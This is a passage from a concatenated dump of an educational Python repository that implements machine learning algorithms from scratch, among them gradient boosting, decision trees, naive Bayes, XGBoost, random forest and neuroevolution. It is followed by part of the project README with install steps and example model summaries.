min_samples_split self.min_impurity = min_impurity self.max_depth = max_depth self.regression = regression self.bar = progressbar.ProgressBar(widgets=bar_widgets) # Square loss for regression # Log loss for classification self.loss = SquareLoss() if not self.regression: self.loss = CrossEntropy() # Initialize regression trees self.trees = [] for _ in range(n_estimators): tree = RegressionTree( min_samples_split=self.min_samples_split, min_impurity=min_impurity, max_depth=self.max_depth) self.trees.append(tree) def fit(self, X, y): y_pred = np.full(np.shape(y), np.mean(y, axis=0)) for i in self.bar(range(self.n_estimators)): gradient = self.loss.gradient(y, y_pred) self.trees[i].fit(X, gradient) update = self.trees[i].predict(X) # Update y prediction y_pred -= np.multiply(self.learning_rate, update) def predict(self, X): y_pred = np.array([]) # Make predictions for tree in self.trees: update = tree.predict(X) update = np.multiply(self.learning_rate, update) y_pred = -update if not y_pred.any() else y_pred - update if not self.regression: # Turn into probability distribution y_pred = np.exp(y_pred) / np.expand_dims(np.sum(np.exp(y_pred), axis=1), axis=1) # Set label to the value that maximizes probability y_pred = np.argmax(y_pred, axis=1) return y_pred class GradientBoostingRegressor(GradientBoosting): def __init__(self, n_estimators=200, learning_rate=0.5, min_samples_split=2, min_var_red=1e-7, max_depth=4, debug=False): super(GradientBoostingRegressor, self).__init__(n_estimators=n_estimators, learning_rate=learning_rate, min_samples_split=min_samples_split, min_impurity=min_var_red, max_depth=max_depth, regression=True) class GradientBoostingClassifier(GradientBoosting): def __init__(self, n_estimators=200, learning_rate=.5, min_samples_split=2, min_info_gain=1e-7, max_depth=2, debug=False): super(GradientBoostingClassifier, self).__init__(n_estimators=n_estimators, learning_rate=learning_rate, min_samples_split=min_samples_split, min_impurity=min_info_gain, max_depth=max_depth, regression=False) def fit(self, X, y): y = to_categorical(y) super(GradientBoostingClassifier, self).fit(X, y) File: mlfromscratch/supervised_learning/__init__.py from .adaboost import Adaboost from .bayesian_regression import BayesianRegression from .decision_tree import RegressionTree, ClassificationTree, XGBoostRegressionTree from .gradient_boosting import GradientBoostingClassifier, GradientBoostingRegressor from .k_nearest_neighbors import KNN from .linear_discriminant_analysis import LDA from .regression import LinearRegression, PolynomialRegression, LassoRegression from .regression import RidgeRegression, PolynomialRidgeRegression, ElasticNet from .logistic_regression import LogisticRegression from .multi_class_lda import MultiClassLDA from .naive_bayes import NaiveBayes from .perceptron import Perceptron from .random_forest import RandomForest from .support_vector_machine import SupportVectorMachine from .xgboost import XGBoost from .neuroevolution import Neuroevolution from .particle_swarm_optimization import ParticleSwarmOptimizedNN File: mlfromscratch/supervised_learning/k_nearest_neighbors.py from __future__ import print_function, division import numpy as np from mlfromscratch.utils import euclidean_distance class KNN(): """ K Nearest Neighbors classifier. Parameters: ----------- k: int The number of closest neighbors that will determine the class of the sample that we wish to predict. """ def __init__(self, k=5): self.k = k def _vote(self, neighbor_labels): """ Return the most common class among the neighbor samples """ counts = np.bincount(neighbor_labels.astype('int')) return counts.argmax() def predict(self, X_test, X_train, y_train): y_pred = np.empty(X_test.shape[0]) # Determine the class of each sample for i, test_sample in enumerate(X_test): # Sort the training samples by their distance to the test sample and get the K nearest idx = np.argsort([euclidean_distance(test_sample, x) for x in X_train])[:self.k] # Extract the labels of the K nearest neighboring training samples k_nearest_neighbors = np.array([y_train[i] for i in idx]) # Label sample as the most common class label y_pred[i] = self._vote(k_nearest_neighbors) return y_pred File: mlfromscratch/supervised_learning/naive_bayes.py from __future__ import division, print_function import numpy as np import math from mlfromscratch.utils import train_test_split, normalize from mlfromscratch.utils import Plot, accuracy_score class NaiveBayes(): """The Gaussian Naive Bayes classifier. """ def fit(self, X, y): self.X, self.y = X, y self.classes = np.unique(y) self.parameters = [] # Calculate the mean and variance of each feature for each class for i, c in enumerate(self.classes): # Only select the rows where the label equals the given class X_where_c = X[np.where(y == c)] self.parameters.append([]) # Add the mean and variance for each feature (column) for col in X_where_c.T: parameters = {"mean": col.mean(), "var": col.var()} self.parameters[i].append(parameters) def _calculate_likelihood(self, mean, var, x): """ Gaussian likelihood of the data x given mean and var """ eps = 1e-4 # Added in denominator to prevent division by zero coeff = 1.0 / math.sqrt(2.0 * math.pi * var + eps) exponent = math.exp(-(math.pow(x - mean, 2) / (2 * var + eps))) return coeff * exponent def _calculate_prior(self, c): """ Calculate the prior of class c (samples where class == c / total number of samples)""" frequency = np.mean(self.y == c) return frequency def _classify(self, sample): """ Classification using Bayes Rule P(Y|X) = P(X|Y)*P(Y)/P(X), or Posterior = Likelihood * Prior / Scaling Factor P(Y|X) - The posterior is the probability that sample x is of class y given the feature values of x being distributed according to distribution of y and the prior. P(X|Y) - Likelihood of data X given class distribution Y. Gaussian distribution (given by _calculate_likelihood) P(Y) - Prior (given by _calculate_prior) P(X) - Scales the posterior to make it a proper probability distribution. This term is ignored in this implementation since it doesn't affect which class distribution the sample is most likely to belong to. Classifies the sample as the class that results in the largest P(Y|X) (posterior) """ posteriors = [] # Go through list of classes for i, c in enumerate(self.classes): # Initialize posterior as prior posterior = self._calculate_prior(c) # Naive assumption (independence): # P(x1,x2,x3|Y) = P(x1|Y)*P(x2|Y)*P(x3|Y) # Posterior is product of prior and likelihoods (ignoring scaling factor) for feature_value, params in zip(sample, self.parameters[i]): # Likelihood of feature value given distribution of feature values given y likelihood = self._calculate_likelihood(params["mean"], params["var"], feature_value) posterior *= likelihood posteriors.append(posterior) # Return the class with the largest posterior probability return self.classes[np.argmax(posteriors)] def predict(self, X): """ Predict the class labels of the samples in X """ y_pred = [self._classify(sample) for sample in X] return y_pred File: mlfromscratch/supervised_learning/decision_tree.py from __future__ import division, print_function import numpy as np from mlfromscratch.utils import divide_on_feature, train_test_split, standardize, mean_squared_error from mlfromscratch.utils import calculate_entropy, accuracy_score, calculate_variance class DecisionNode(): """Class that represents a decision node or leaf in the decision tree Parameters: ----------- feature_i: int Feature index which we want to use as the threshold measure. threshold: float The value that we will compare feature values at feature_i against to determine the prediction. value: float The class prediction if classification tree, or float value if regression tree. true_branch: DecisionNode Next decision node for samples where features value met the threshold. false_branch: DecisionNode Next decision node for samples where features value did not meet the threshold. """ def __init__(self, feature_i=None, threshold=None, value=None, true_branch=None, false_branch=None): self.feature_i = feature_i # Index for the feature that is tested self.threshold = threshold # Threshold value for feature self.value = value # Value if the node is a leaf in the tree self.true_branch = true_branch # 'Left' subtree self.false_branch = false_branch # 'Right' subtree # Super class of RegressionTree and ClassificationTree class DecisionTree(object): """Super class of RegressionTree and ClassificationTree. Parameters: ----------- min_samples_split: int The minimum number of samples needed to make a split when building a tree. min_impurity: float The minimum impurity required to split the tree further. max_depth: int The maximum depth of a tree. loss: function Loss function that is used for Gradient Boosting models to calculate impurity. """ def __init__(self, min_samples_split=2, min_impurity=1e-7, max_depth=float("inf"), loss=None): self.root = None # Root node in dec. tree # Minimum n of samples to justify split self.min_samples_split = min_samples_split # The minimum impurity to justify split self.min_impurity = min_impurity # The maximum depth to grow the tree to self.max_depth = max_depth # Function to calculate impurity (classif.=>info gain, regr=>variance reduct.) self._impurity_calculation = None # Function to determine prediction of y at leaf self._leaf_value_calculation = None # If y is one-hot encoded (multi-dim) or not (one-dim) self.one_dim = None # If Gradient Boost self.loss = loss def fit(self, X, y, loss=None): """ Build decision tree """ self.one_dim = len(np.shape(y)) == 1 self.root = self._build_tree(X, y) self.loss=None def _build_tree(self, X, y, current_depth=0): """ Recursive method which builds out the decision tree and splits X and respective y on the feature of X which (based on impurity) best separates the data""" largest_impurity = 0 best_criteria = None # Feature index and threshold best_sets = None # Subsets of the data # Check if expansion of y is needed if len(np.shape(y)) == 1: y = np.expand_dims(y, axis=1) # Add y as last column of X Xy = np.concatenate((X, y), axis=1) n_samples, n_features = np.shape(X) if n_samples >= self.min_samples_split and current_depth <= self.max_depth: # Calculate the impurity for each feature for feature_i in range(n_features): # All values of feature_i feature_values = np.expand_dims(X[:, feature_i], axis=1) unique_values = np.unique(feature_values) # Iterate through all unique values of feature column i and # calculate the impurity for threshold in unique_values: # Divide X and y depending on if the feature value of X at index feature_i # meets the threshold Xy1, Xy2 = divide_on_feature(Xy, feature_i, threshold) if len(Xy1) > 0 and len(Xy2) > 0: # Select the y-values of the two sets y1 = Xy1[:, n_features:] y2 = Xy2[:, n_features:] # Calculate impurity impurity = self._impurity_calculation(y, y1, y2) # If this threshold resulted in a higher information gain than previously # recorded save the threshold value and the feature # index if impurity > largest_impurity: largest_impurity = impurity best_criteria = {"feature_i": feature_i, "threshold": threshold} best_sets = { "leftX": Xy1[:, :n_features], # X of left subtree "lefty": Xy1[:, n_features:], # y of left subtree "rightX": Xy2[:, :n_features], # X of right subtree "righty": Xy2[:, n_features:] # y of right subtree } if largest_impurity > self.min_impurity: # Build subtrees for the right and left branches true_branch = self._build_tree(best_sets["leftX"], best_sets["lefty"], current_depth + 1) false_branch = self._build_tree(best_sets["rightX"], best_sets["righty"], current_depth + 1) return DecisionNode(feature_i=best_criteria["feature_i"], threshold=best_criteria[ "threshold"], true_branch=true_branch, false_branch=false_branch) # We're at leaf => determine value leaf_value = self._leaf_value_calculation(y) return DecisionNode(value=leaf_value) def predict_value(self, x, tree=None): """ Do a recursive search down the tree and make a prediction of the data sample by the value of the leaf that we end up at """ if tree is None: tree = self.root # If we have a value (i.e we're at a leaf) => return value as the prediction if tree.value is not None: return tree.value # Choose the feature that we will test feature_value = x[tree.feature_i] # Determine if we will follow left or right branch branch = tree.false_branch if isinstance(feature_value, int) or isinstance(feature_value, float): if feature_value >= tree.threshold: branch = tree.true_branch elif feature_value == tree.threshold: branch = tree.true_branch # Test subtree return self.predict_value(x, branch) def predict(self, X): """ Classify samples one by one and return the set of labels """ y_pred = [self.predict_value(sample) for sample in X] return y_pred def print_tree(self, tree=None, indent=" "): """ Recursively print the decision tree """ if not tree: tree = self.root # If we're at leaf => print the label if tree.value is not None: print (tree.value) # Go deeper down the tree else: # Print test print ("%s:%s? " % (tree.feature_i, tree.threshold)) # Print the true scenario print ("%sT->" % (indent), end="") self.print_tree(tree.true_branch, indent + indent) # Print the false scenario print ("%sF->" % (indent), end="") self.print_tree(tree.false_branch, indent + indent) class XGBoostRegressionTree(DecisionTree): """ Regression tree for XGBoost - Reference - http://xgboost.readthedocs.io/en/latest/model.html """ def _split(self, y): """ y contains y_true in left half of the middle column and y_pred in the right half. Split and return the two matrices """ col = int(np.shape(y)[1]/2) y, y_pred = y[:, :col], y[:, col:] return y, y_pred def _gain(self, y, y_pred): nominator = np.power((y * self.loss.gradient(y, y_pred)).sum(), 2) denominator = self.loss.hess(y, y_pred).sum() return 0.5 * (nominator / denominator) def _gain_by_taylor(self, y, y1, y2): # Split y, y_pred = self._split(y) y1, y1_pred = self._split(y1) y2, y2_pred = self._split(y2) true_gain = self._gain(y1, y1_pred) false_gain = self._gain(y2, y2_pred) gain = self._gain(y, y_pred) return true_gain + false_gain - gain def _approximate_update(self, y): # y split into y, y_pred y, y_pred = self._split(y) # Newton's Method gradient = np.sum(y * self.loss.gradient(y, y_pred), axis=0) hessian = np.sum(self.loss.hess(y, y_pred), axis=0) update_approximation = gradient / hessian return update_approximation def fit(self, X, y): self._impurity_calculation = self._gain_by_taylor self._leaf_value_calculation = self._approximate_update super(XGBoostRegressionTree, self).fit(X, y) class RegressionTree(DecisionTree): def _calculate_variance_reduction(self, y, y1, y2): var_tot = calculate_variance(y) var_1 = calculate_variance(y1) var_2 = calculate_variance(y2) frac_1 = len(y1) / len(y) frac_2 = len(y2) / len(y) # Calculate the variance reduction variance_reduction = var_tot - (frac_1 * var_1 + frac_2 * var_2) return sum(variance_reduction) def _mean_of_y(self, y): value = np.mean(y, axis=0) return value if len(value) > 1 else value[0] def fit(self, X, y): self._impurity_calculation = self._calculate_variance_reduction self._leaf_value_calculation = self._mean_of_y super(RegressionTree, self).fit(X, y) class ClassificationTree(DecisionTree): def _calculate_information_gain(self, y, y1, y2): # Calculate information gain p = len(y1) / len(y) entropy = calculate_entropy(y) info_gain = entropy - p * \ calculate_entropy(y1) - (1 - p) * \ calculate_entropy(y2) return info_gain def _majority_vote(self, y): most_common = None max_count = 0 for label in np.unique(y): # Count number of occurences of samples with label count = len(y[y == label]) if count > max_count: most_common = label max_count = count return most_common def fit(self, X, y): self._impurity_calculation = self._calculate_information_gain self._leaf_value_calculation = self._majority_vote super(ClassificationTree, self).fit(X, y) File: mlfromscratch/supervised_learning/bayesian_regression.py from __future__ import print_function, division import numpy as np from scipy.stats import chi2, multivariate_normal from mlfromscratch.utils import mean_squared_error, train_test_split, polynomial_features class BayesianRegression(object): """Bayesian regression model. If poly_degree is specified the features will be transformed to with a polynomial basis function, which allows for polynomial regression. Assumes Normal prior and likelihood for the weights and scaled inverse chi-squared prior and likelihood for the variance of the weights. Parameters: ----------- n_draws: float The number of simulated draws from the posterior of the parameters. mu0: array The mean values of the prior Normal distribution of the parameters. omega0: array The precision matrix of the prior Normal distribution of the parameters. nu0: float The degrees of freedom of the prior scaled inverse chi squared distribution. sigma_sq0: float The scale parameter of the prior scaled inverse chi squared distribution. poly_degree: int The polynomial degree that the features should be transformed to. Allows for polynomial regression. cred_int: float The credible interval (ETI in this impl.). 95 => 95% credible interval of the posterior of the parameters. Reference: https://github.com/mattiasvillani/BayesLearnCourse/raw/master/Slides/BayesLearnL5.pdf """ def __init__(self, n_draws, mu0, omega0, nu0, sigma_sq0, poly_degree=0, cred_int=95): self.w = None self.n_draws = n_draws self.poly_degree = poly_degree self.cred_int = cred_int # Prior parameters self.mu0 = mu0 self.omega0 = omega0 self.nu0 = nu0 self.sigma_sq0 = sigma_sq0 # Allows for simulation from the scaled inverse chi squared # distribution. Assumes the variance is distributed according to # this distribution. # Reference: # https://en.wikipedia.org/wiki/Scaled_inverse_chi-squared_distribution def _draw_scaled_inv_chi_sq(self, n, df, scale): X = chi2.rvs(size=n, df=df) sigma_sq = df * scale / X return sigma_sq def fit(self, X, y): # If polynomial transformation if self.poly_degree: X = polynomial_features(X, degree=self.poly_degree) n_samples, n_features = np.shape(X) X_X = X.T.dot(X) # Least squares approximate of beta beta_hat = np.linalg.pinv(X_X).dot(X.T).dot(y) # The posterior parameters can be determined analytically since we assume # conjugate priors for the likelihoods. # Normal prior / likelihood => Normal posterior mu_n = np.linalg.pinv(X_X + self.omega0).dot(X_X.dot(beta_hat)+self.omega0.dot(self.mu0)) omega_n = X_X + self.omega0 # Scaled inverse chi-squared prior / likelihood => Scaled inverse chi-squared posterior nu_n = self.nu0 + n_samples sigma_sq_n = (1.0/nu_n)*(self.nu0*self.sigma_sq0 + \ (y.T.dot(y) + self.mu0.T.dot(self.omega0).dot(self.mu0) - mu_n.T.dot(omega_n.dot(mu_n)))) # Simulate parameter values for n_draws beta_draws = np.empty((self.n_draws, n_features)) for i in range(self.n_draws): sigma_sq = self._draw_scaled_inv_chi_sq(n=1, df=nu_n, scale=sigma_sq_n) beta = multivariate_normal.rvs(size=1, mean=mu_n[:,0], cov=sigma_sq*np.linalg.pinv(omega_n)) # Save parameter draws beta_draws[i, :] = beta # Select the mean of the simulated variables as the ones used to make predictions self.w = np.mean(beta_draws, axis=0) # Lower and upper boundary of the credible interval l_eti = 50 - self.cred_int/2 u_eti = 50 + self.cred_int/2 self.eti = np.array([[np.percentile(beta_draws[:,i], q=l_eti), np.percentile(beta_draws[:,i], q=u_eti)] \ for i in range(n_features)]) def predict(self, X, eti=False): # If polynomial transformation if self.poly_degree: X = polynomial_features(X, degree=self.poly_degree) y_pred = X.dot(self.w) # If the lower and upper boundaries for the 95% # equal tail interval should be returned if eti: lower_w = self.eti[:, 0] upper_w = self.eti[:, 1] y_lower_pred = X.dot(lower_w) y_upper_pred = X.dot(upper_w) return y_pred, y_lower_pred, y_upper_pred return y_pred File: mlfromscratch/supervised_learning/logistic_regression.py from __future__ import print_function, division import numpy as np import math from mlfromscratch.utils import make_diagonal, Plot from mlfromscratch.deep_learning.activation_functions import Sigmoid class LogisticRegression(): """ Logistic Regression classifier. Parameters: ----------- learning_rate: float The step length that will be taken when following the negative gradient during training. gradient_descent: boolean True or false depending if gradient descent should be used when training. If false then we use batch optimization by least squares. """ def __init__(self, learning_rate=.1, gradient_descent=True): self.param = None self.learning_rate = learning_rate self.gradient_descent = gradient_descent self.sigmoid = Sigmoid() def _initialize_parameters(self, X): n_features = np.shape(X)[1] # Initialize parameters between [-1/sqrt(N), 1/sqrt(N)] limit = 1 / math.sqrt(n_features) self.param = np.random.uniform(-limit, limit, (n_features,)) def fit(self, X, y, n_iterations=4000): self._initialize_parameters(X) # Tune parameters for n iterations for i in range(n_iterations): # Make a new prediction y_pred = self.sigmoid(X.dot(self.param)) if self.gradient_descent: # Move against the gradient of the loss function with # respect to the parameters to minimize the loss self.param -= self.learning_rate * -(y - y_pred).dot(X) else: # Make a diagonal matrix of the sigmoid gradient column vector diag_gradient = make_diagonal(self.sigmoid.gradient(X.dot(self.param))) # Batch opt: self.param = np.linalg.pinv(X.T.dot(diag_gradient).dot(X)).dot(X.T).dot(diag_gradient.dot(X).dot(self.param) + y - y_pred) def predict(self, X): y_pred = np.round(self.sigmoid(X.dot(self.param))).astype(int) return y_pred File: mlfromscratch/supervised_learning/xgboost.py from __future__ import division, print_function import numpy as np import progressbar from mlfromscratch.utils import train_test_split, standardize, to_categorical, normalize from mlfromscratch.utils import mean_squared_error, accuracy_score from mlfromscratch.supervised_learning import XGBoostRegressionTree from mlfromscratch.deep_learning.activation_functions import Sigmoid from mlfromscratch.utils.misc import bar_widgets from mlfromscratch.utils import Plot class LogisticLoss(): def __init__(self): sigmoid = Sigmoid() self.log_func = sigmoid self.log_grad = sigmoid.gradient def loss(self, y, y_pred): y_pred = np.clip(y_pred, 1e-15, 1 - 1e-15) p = self.log_func(y_pred) return y * np.log(p) + (1 - y) * np.log(1 - p) # gradient w.r.t y_pred def gradient(self, y, y_pred): p = self.log_func(y_pred) return -(y - p) # w.r.t y_pred def hess(self, y, y_pred): p = self.log_func(y_pred) return p * (1 - p) class XGBoost(object): """The XGBoost classifier. Reference: http://xgboost.readthedocs.io/en/latest/model.html Parameters: ----------- n_estimators: int The number of classification trees that are used. learning_rate: float The step length that will be taken when following the negative gradient during training. min_samples_split: int The minimum number of samples needed to make a split when building a tree. min_impurity: float The minimum impurity required to split the tree further. max_depth: int The maximum depth of a tree. """ def __init__(self, n_estimators=200, learning_rate=0.001, min_samples_split=2, min_impurity=1e-7, max_depth=2): self.n_estimators = n_estimators # Number of trees self.learning_rate = learning_rate # Step size for weight update self.min_samples_split = min_samples_split # The minimum n of sampels to justify split self.min_impurity = min_impurity # Minimum variance reduction to continue self.max_depth = max_depth # Maximum depth for tree self.bar = progressbar.ProgressBar(widgets=bar_widgets) # Log loss for classification self.loss = LogisticLoss() # Initialize regression trees self.trees = [] for _ in range(n_estimators): tree = XGBoostRegressionTree( min_samples_split=self.min_samples_split, min_impurity=min_impurity, max_depth=self.max_depth, loss=self.loss) self.trees.append(tree) def fit(self, X, y): y = to_categorical(y) y_pred = np.zeros(np.shape(y)) for i in self.bar(range(self.n_estimators)): tree = self.trees[i] y_and_pred = np.concatenate((y, y_pred), axis=1) tree.fit(X, y_and_pred) update_pred = tree.predict(X) y_pred -= np.multiply(self.learning_rate, update_pred) def predict(self, X): y_pred = None # Make predictions for tree in self.trees: # Estimate gradient and update prediction update_pred = tree.predict(X) if y_pred is None: y_pred = np.zeros_like(update_pred) y_pred -= np.multiply(self.learning_rate, update_pred) # Turn into probability distribution (Softmax) y_pred = np.exp(y_pred) / np.sum(np.exp(y_pred), axis=1, keepdims=True) # Set label to the value that maximizes probability y_pred = np.argmax(y_pred, axis=1) return y_pred File: mlfromscratch/supervised_learning/random_forest.py from __future__ import division, print_function import numpy as np import math import progressbar # Import helper functions from mlfromscratch.utils import divide_on_feature, train_test_split, get_random_subsets, normalize from mlfromscratch.utils import accuracy_score, calculate_entropy from mlfromscratch.unsupervised_learning import PCA from mlfromscratch.supervised_learning import ClassificationTree from mlfromscratch.utils.misc import bar_widgets from mlfromscratch.utils import Plot class RandomForest(): """Random Forest classifier. Uses a collection of classification trees that trains on random subsets of the data using a random subsets of the features. Parameters: ----------- n_estimators: int The number of classification trees that are used. max_features: int The maximum number of features that the classification trees are allowed to use. min_samples_split: int The minimum number of samples needed to make a split when building a tree. min_gain: float The minimum impurity required to split the tree further. max_depth: int The maximum depth of a tree. """ def __init__(self, n_estimators=100, max_features=None, min_samples_split=2, min_gain=0, max_depth=float("inf")): self.n_estimators = n_estimators # Number of trees self.max_features = max_features # Maxmimum number of features per tree self.min_samples_split = min_samples_split self.min_gain = min_gain # Minimum information gain req. to continue self.max_depth = max_depth # Maximum depth for tree self.progressbar = progressbar.ProgressBar(widgets=bar_widgets) # Initialize decision trees self.trees = [] for _ in range(n_estimators): self.trees.append( ClassificationTree( min_samples_split=self.min_samples_split, min_impurity=min_gain, max_depth=self.max_depth)) def fit(self, X, y): n_features = np.shape(X)[1] # If max_features have not been defined => select it as # sqrt(n_features) if not self.max_features: self.max_features = int(math.sqrt(n_features)) # Choose one random subset of the data for each tree subsets = get_random_subsets(X, y, self.n_estimators) for i in self.progressbar(range(self.n_estimators)): X_subset, y_subset = subsets[i] # Feature bagging (select random subsets of the features) idx = np.random.choice(range(n_features), size=self.max_features, replace=True) # Save the indices of the features for prediction self.trees[i].feature_indices = idx # Choose the features corresponding to the indices X_subset = X_subset[:, idx] # Fit the tree to the data self.trees[i].fit(X_subset, y_subset) def predict(self, X): y_preds = np.empty((X.shape[0], len(self.trees))) # Let each tree make a prediction on the data for i, tree in enumerate(self.trees): # Indices of the features that the tree has trained on idx = tree.feature_indices # Make a prediction based on those features prediction = tree.predict(X[:, idx]) y_preds[:, i] = prediction y_pred = [] # For each sample for sample_predictions in y_preds: # Select the most common class prediction y_pred.append(np.bincount(sample_predictions.astype('int')).argmax()) return y_pred File: mlfromscratch/supervised_learning/neuroevolution.py from __future__ import print_function, division import numpy as np import copy class Neuroevolution(): """ Evolutionary optimization of Neural Networks. Parameters: ----------- n_individuals: int The number of neural networks that are allowed in the population at a time. mutation_rate: float The probability that a weight will be mutated. model_builder: method A method which returns a user specified NeuralNetwork instance. """ def __init__(self, population_size, mutation_rate, model_builder): self.population_size = population_size self.mutation_rate = mutation_rate self.model_builder = model_builder def _build_model(self, id): """ Returns a new individual """ model = self.model_builder(n_inputs=self.X.shape[1], n_outputs=self.y.shape[1]) model.id = id model.fitness = 0 model.accuracy = 0 return model def _initialize_population(self): """ Initialization of the neural networks forming the population""" self.population = [] for _ in range(self.population_size): model = self._build_model(id=np.random.randint(1000)) self.population.append(model) def _mutate(self, individual, var=1): """ Add zero mean gaussian noise to the layer weights with probability mutation_rate """ for layer in individual.layers: if hasattr(layer, 'W'): # Mutation of weight with probability self.mutation_rate mutation_mask = np.random.binomial(1, p=self.mutation_rate, size=layer.W.shape) layer.W += np.random.normal(loc=0, scale=var, size=layer.W.shape) * mutation_mask mutation_mask = np.random.binomial(1, p=self.mutation_rate, size=layer.w0.shape) layer.w0 += np.random.normal(loc=0, scale=var, size=layer.w0.shape) * mutation_mask return individual def _inherit_weights(self, child, parent): """ Copies the weights from parent to child """ for i in range(len(child.layers)): if hasattr(child.layers[i], 'W'): # The child inherits both weights W and bias weights w0 child.layers[i].W = parent.layers[i].W.copy() child.layers[i].w0 = parent.layers[i].w0.copy() def _crossover(self, parent1, parent2): """ Performs crossover between the neurons in parent1 and parent2 to form offspring """ child1 = self._build_model(id=parent1.id+1) self._inherit_weights(child1, parent1) child2 = self._build_model(id=parent2.id+1) self._inherit_weights(child2, parent2) # Perform crossover for i in range(len(child1.layers)): if hasattr(child1.layers[i], 'W'): n_neurons = child1.layers[i].W.shape[1] # Perform crossover between the individuals' neuron weights cutoff = np.random.randint(0, n_neurons) child1.layers[i].W[:, cutoff:] = parent2.layers[i].W[:, cutoff:].copy() child1.layers[i].w0[:, cutoff:] = parent2.layers[i].w0[:, cutoff:].copy() child2.layers[i].W[:, cutoff:] = parent1.layers[i].W[:, cutoff:].copy() child2.layers[i].w0[:, cutoff:] = parent1.layers[i].w0[:, cutoff:].copy() return child1, child2 def _calculate_fitness(self): """ Evaluate the NNs on the test set to get fitness scores """ for individual in self.population: loss, acc = individual.test_on_batch(self.X, self.y) individual.fitness = 1 / (loss + 1e-8) individual.accuracy = acc def evolve(self, X, y, n_generations): """ Will evolve the population for n_generations based on dataset X and labels y""" self.X, self.y = X, y self._initialize_population() # The 40% highest fittest individuals will be selected for the next generation n_winners = int(self.population_size * 0.4) # The fittest 60% of the population will be selected as parents to form offspring n_parents = self.population_size - n_winners for epoch in range(n_generations): # Determine the fitness of the individuals in the population self._calculate_fitness() # Sort population by fitness sorted_i = np.argsort([model.fitness for model in self.population])[::-1] self.population = [self.population[i] for i in sorted_i] # Get the individual with the highest fitness fittest_individual = self.population[0] print ("[%d Best Individual - Fitness: %.5f, Accuracy: %.1f%%]" % (epoch, fittest_individual.fitness, float(100*fittest_individual.accuracy))) # The 'winners' are selected for the next generation next_population = [self.population[i] for i in range(n_winners)] total_fitness = np.sum([model.fitness for model in self.population]) # The probability that a individual will be selected as a parent is proportionate to its fitness parent_probabilities = [model.fitness / total_fitness for model in self.population] # Select parents according to probabilities (without replacement to preserve diversity) parents = np.random.choice(self.population, size=n_parents, p=parent_probabilities, replace=False) for i in np.arange(0, len(parents), 2): # Perform crossover to produce offspring child1, child2 = self._crossover(parents[i], parents[i+1]) # Save mutated offspring for next population next_population += [self._mutate(child1), self._mutate(child2)] self.population = next_population return fittest_individual
# Machine Learning From Scratch ## About Python implementations of some of the fundamental Machine Learning models and algorithms from scratch. The purpose of this project is not to produce as optimized and computationally efficient algorithms as possible but rather to present the inner workings of them in a transparent and accessible way. ## Table of Contents - [Machine Learning From Scratch](#machine-learning-from-scratch) * [About](#about) * [Table of Contents](#table-of-contents) * [Installation](#installation) * [Examples](#examples) + [Polynomial Regression](#polynomial-regression) + [Classification With CNN](#classification-with-cnn) + [Density-Based Clustering](#density-based-clustering) + [Generating Handwritten Digits](#generating-handwritten-digits) + [Deep Reinforcement Learning](#deep-reinforcement-learning) + [Image Reconstruction With RBM](#image-reconstruction-with-rbm) + [Evolutionary Evolved Neural Network](#evolutionary-evolved-neural-network) + [Genetic Algorithm](#genetic-algorithm) + [Association Analysis](#association-analysis) * [Implementations](#implementations) + [Supervised Learning](#supervised-learning) + [Unsupervised Learning](#unsupervised-learning) + [Reinforcement Learning](#reinforcement-learning) + [Deep Learning](#deep-learning) * [Contact](#contact) ## Installation $ git clone https://github.com/eriklindernoren/ML-From-Scratch $ cd ML-From-Scratch $ python setup.py install ## Examples ### Polynomial Regression $ python mlfromscratch/examples/polynomial_regression.py <p align="center"> <img src="http://eriklindernoren.se/images/p_reg.gif" width="640"\> </p> <p align="center"> Figure: Training progress of a regularized polynomial regression model fitting <br> temperature data measured in Linköping, Sweden 2016. </p> ### Classification With CNN $ python mlfromscratch/examples/convolutional_neural_network.py +---------+ | ConvNet | +---------+ Input Shape: (1, 8, 8) +----------------------+------------+--------------+ | Layer Type | Parameters | Output Shape | +----------------------+------------+--------------+ | Conv2D | 160 | (16, 8, 8) | | Activation (ReLU) | 0 | (16, 8, 8) | | Dropout | 0 | (16, 8, 8) | | BatchNormalization | 2048 | (16, 8, 8) | | Conv2D | 4640 | (32, 8, 8) | | Activation (ReLU) | 0 | (32, 8, 8) | | Dropout | 0 | (32, 8, 8) | | BatchNormalization | 4096 | (32, 8, 8) | | Flatten | 0 | (2048,) | | Dense | 524544 | (256,) | | Activation (ReLU) | 0 | (256,) | | Dropout | 0 | (256,) | | BatchNormalization | 512 | (256,) | | Dense | 2570 | (10,) | | Activation (Softmax) | 0 | (10,) | +----------------------+------------+--------------+ Total Parameters: 538570 Training: 100% [------------------------------------------------------------------------] Time: 0:01:55 Accuracy: 0.987465181058 <p align="center"> <img src="http://eriklindernoren.se/images/mlfs_cnn1.png" width="640"> </p> <p align="center"> Figure: Classification of the digit dataset using CNN. </p> ### Density-Based Clustering $ python mlfromscratch/examples/dbscan.py <p align="center"> <img src="http://eriklindernoren.se/images/mlfs_dbscan.png" width="640"> </p> <p align="center"> Figure: Clustering of the moons dataset using DBSCAN. </p> ### Generating Handwritten Digits $ python mlfromscratch/unsupervised_learning/generative_adversarial_network.py +-----------+ | Generator | +-----------+ Input Shape: (100,) +------------------------+------------+--------------+ | Layer Type | Parameters | Output Shape | +------------------------+------------+--------------+ | Dense | 25856 | (256,) | | Activation (LeakyReLU) | 0 | (256,) | | BatchNormalization | 512 | (256,) | | Dense | 131584 | (512,) | | Activation (LeakyReLU) | 0 | (512,) | | BatchNormalization | 1024 | (512,) | | Dense | 525312 | (1024,) | | Activation (LeakyReLU) | 0 | (1024,) | | BatchNormalization | 2048 | (1024,) | | Dense | 803600 | (784,) | | Activation (TanH) | 0 | (784,) | +------------------------+------------+--------------+ Total Parameters: 1489936 +---------------+ | Discriminator | +---------------+ Input Shape: (784,) +------------------------+------------+--------------+ | Layer Type | Parameters | Output Shape | +------------------------+------------+--------------+ | Dense | 401920 | (512,) | | Activation (LeakyReLU) | 0 | (512,) | | Dropout | 0 | (512,) | | Dense | 131328 | (256,) | | Activation (LeakyReLU) | 0 | (256,) | | Dropout | 0 | (256,) | | Dense | 514 | (2,) | | Activation (Softmax) | 0 | (2,) | +------------------------+------------+--------------+ Total Parameters: 533762 <p align="center"> <img src="http://eriklindernoren.se/images/gan_mnist5.gif" width="640"> </p> <p align="center"> Figure: Training progress of a Generative Adversarial Network generating <br> handwritten digits. </p> ### Deep Reinforcement Learning $ python mlfromscratch/examples/deep_q_network.py +----------------+ | Deep Q-Network | +----------------+ Input Shape: (4,) +-------------------+------------+--------------+ | Layer Type | Parameters | Output Shape | +-------------------+------------+--------------+ | Dense | 320 | (64,) | | Activation 